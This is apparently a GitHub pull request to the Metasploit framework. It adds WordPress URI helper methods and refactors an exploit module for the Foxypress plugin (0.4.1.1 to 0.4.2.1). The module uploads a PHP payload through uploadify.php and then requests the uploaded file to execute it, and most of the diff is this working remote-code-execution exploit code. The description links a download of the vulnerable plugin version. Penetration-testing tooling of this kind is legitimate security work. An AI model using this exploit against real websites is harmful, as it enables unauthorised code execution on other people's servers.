### PR TITLE
Updated foxpress module

### DIFF
--- a/lib/msf/http/wordpress/uris.rb
+++ b/lib/msf/http/wordpress/uris.rb
@@ -80,4 +80,25 @@ module Msf::HTTP::Wordpress::URIs
     normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
   end
 
+  # Returns the Wordpress wp-content dir URL
+  #
+  # @return [String] Wordpress wp-content dir URL
+  def wordpress_url_wp_content
+    normalize_uri(target_uri.path, wp_content_dir)
+  end
+
+  # Returns the Wordpress plugins dir URL
+  #
+  # @return [String] Wordpress plugins dir URL
+  def wordpress_url_plugins
+    normalize_uri(wordpress_url_wp_content, 'plugins')
+  end
+
+  # Returns the Wordpress themes dir URL
+  #
+  # @return [String] Wordpress themes dir URL
+  def wordpress_url_themes
+    normalize_uri(wordpress_url_wp_content, 'themes')
+  end
+
 end

--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -8,17 +8,19 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'           => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution',
-      'Description'    => %q{
+      'Description'    => %q(
           This module exploits an arbitrary PHP code execution flaw in the WordPress
         blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
         file upload and remote code execution via the uploadify.php script. The Foxypress
         plug-in versions 0.4.2.1 and below are vulnerable.
-      },
+      ),
       'Author'         =>
         [
           'Sammy FORGIT', # Vulnerability Discovery, PoC
@@ -27,79 +29,56 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['EDB', '18991'],
-          ['OSVDB', '82652'],
-          ['BID', '53805'],
+          %w(EDB 18991),
+          %w(OSVDB 82652),
+          %w(BID 53805)
         ],
       'Privileged'     => false,
-      'Payload'        =>
-        {
-          'Compat'      =>
-            {
-              'ConnectionType' => 'find',
-            },
-        },
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
-      'Targets'        => [[ 'Automatic', { }]],
+      'Targets'        => [['Foxypress <= 0.4.2.1', {}]],
       'DisclosureDate' => 'Jun 05 2012',
       'DefaultTarget' => 0))
-
-    register_options(
-      [
-        OptString.new('TARGETURI', [true, "The full URI path to WordPress", "/"]),
-      ], self.class)
   end
 
   def check
-    uri = target_uri.path
-
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'GET',
-      'uri'    => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php")
-    })
+      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php')
+    )
 
-    if res and res.code == 200
-      return Exploit::CheckCode::Detected
-    else
-      return Exploit::CheckCode::Safe
-    end
+    return Exploit::CheckCode::Detected if res && res.code == 200
+
+    Exploit::CheckCode::Safe
   end
 
   def exploit
-
-    uri = normalize_uri(target_uri.path)
-    uri << '/' if uri[-1,1] != '/'
-
-    peer = "#{rhost}:#{rport}"
-
     post_data = Rex::MIME::Message.new
-    post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
+    post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
 
     print_status("#{peer} - Sending PHP payload")
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'POST',
-      'uri'    => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php"),
-      'ctype'  => 'multipart/form-data; boundary=' + post_data.bound,
+      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'),
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
       'data'   => post_data.to_s
-    })
+    )
 
-    if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
+    if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
       print_error("#{peer} - File wasn't uploaded, aborting!")
       return
     end
 
-    print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
-    res = send_request_cgi({
+    filename = "#{Regexp.last_match[1]}.php"
+
+    print_good("#{peer} - Our payload is at: #{filename}. Calling payload...")
+    register_files_for_cleanup(filename)
+    res = send_request_cgi(
       'method' => 'GET',
-      'uri'    => normalize_uri(uri, "wp-content/affiliate_images", "#{$1}.php")
-    })
+      'uri'    => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename)
+    )
 
-    if res and res.code != 200
-      print_error("#{peer} - Server returned #{res.code.to_s}")
-    end
-
+    print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200
   end
-
 end

--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
           This module exploits an arbitrary PHP code execution flaw in the WordPress
         blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
         file upload and remote code execution via the uploadify.php script. The Foxypress
-        plug-in versions 0.4.2.1 and below are vulnerable.
+        plug-in versions 0.4.1.1 to 0.4.2.1 are vulnerable.
       ),
       'Author'         =>
         [
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
-      'Targets'        => [['Foxypress <= 0.4.2.1', {}]],
+      'Targets'        => [['Foxypress 0.4.1.1 - 0.4.2.1', {}]],
       'DisclosureDate' => 'Jun 05 2012',
       'DefaultTarget' => 0))
   end


### PR DESCRIPTION
This PR updates the Foxpress Wordpress module.

Verification:
![11](https://cloud.githubusercontent.com/assets/105281/3726624/43102eb0-1695-11e4-8b0d-cf28f63c1637.png)

Vulnerable Version download:
http://downloads.wordpress.org/plugin/foxypress.0.4.2.1.zip

Pinging @jvazquez-r7 for this PR. This needs to be merged because of the uris.rb change, so I can continue on the other wordpress plugins. THX!
